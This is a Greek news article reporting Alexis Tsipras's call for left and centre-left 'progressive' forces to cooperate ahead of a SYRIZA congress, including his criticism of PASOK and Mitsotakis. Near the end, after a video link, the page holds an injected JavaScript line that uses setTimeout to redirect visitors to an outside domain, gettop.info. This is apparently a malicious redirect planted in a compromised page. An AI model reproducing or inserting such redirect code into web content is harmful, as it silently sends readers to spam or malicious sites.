«Άνοιγμα» Τσίπρα στον «προοδευτικό» χώρο (BINTEO)

0
16

 

Πρόσκληση σε προσωπικότητες του «προοδευτικού» χώρου για συμπόρευση της Αριστεράς με τις δυνάμεις της Σοσιαλδημοκρατίας και της Κεντροαριστεράς απηύθυνε ο πρωθυπουργός Αλέξης Τσίπρας, μιλώντας στην εκδήλωση του ευρωβουλευτή Δημήτρη Παπαδημούλη για τον απολογισμό της ευρωομάδας του ΣΥΡΙΖΑ στο Ευρωπαϊκό Κοινοβούλιο τα τελευταία δύο χρόνια.

Έχοντας απέναντί του στην πρώτη σειρά των καθισμάτων στελέχη όπως ο Φώτης Κουβέλης, η Μαριλίζα Ξενογιαννακοπούλου αλλά και πρώην βουλευτές της ΔΗΜΑΡ, ο Πρωθυπουργός αναφέρθηκε σε «ανοιχτή πρόσκληση διαλόγου και συμπόρευσης σε όλες τις προοδευτικές δυνάμεις και τις προσωπικότητες για την προσπάθεια μας να ξαναστήσουμε την Ελλάδα στα πόδια της με την κοινωνία όρθια και προστατευμένη».

«Από αυτό τον κοινό αγώνα δεν μπορεί και δεν πρέπει να περισσεύει κάνεις και καμία», ήταν η χαρακτηριστική αναφορά του κ. Τσίπρα.

Αναφερόμενος στο επικείμενο συνέδριο του ΣΥΡΙΖΑ ο Πρωθυπουργός άφησε αιχμές για τη Φώφη Γεννηματά και το ΠΑΣΟΚ σημειώνοντας πως «το Συνέδριο του ΣΥΡΙΖΑ πρέπει να είναι ευκαιρία να ξεκινήσει ο αναγκαίος διάλογος και να διευρυνθεί.

Ξέρω ότι σε αυτό το διάλογο δυστυχώς δεν δύνανται να συμμετάσχουν οι οργανωμένες δυνάμεις της ελληνικής Σοσιαλδημοκρατίας που έχουν κάνει δυστυχώς αυτοκαταστροφικές πολιτικές επιλογές στοίχισης πίσω από μια ακραία νεοφιλελεύθερη δεξιά του κ. Μητσοτάκη».

Χρειάζονται συμμαχίες και κοινά βήματα. Και αυτό είναι το στοίχημα της Αριστεράς και των προοδευτικών δυνάμεων σήμερα στην Ευρώπη

Τον διάλογο για το μέλλον της Ευρώπης που προφανώς αφορά και το μέλλον της Ελλάδας, δε μπορούμε παρά να τον διεξάγουμε και στη πατρίδα μας

Οι δυνάμεις της Ελληνικής σοσιαλδημοκρατίας, έχουν κάνει αυτοκαταστροφικές επιλογές στοίχισης πίσω από την νεοφιλελεύθερη δεξιά του κ. Μητσοτάκη.

https://youtu.be/ZjoOXaFVWdE setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here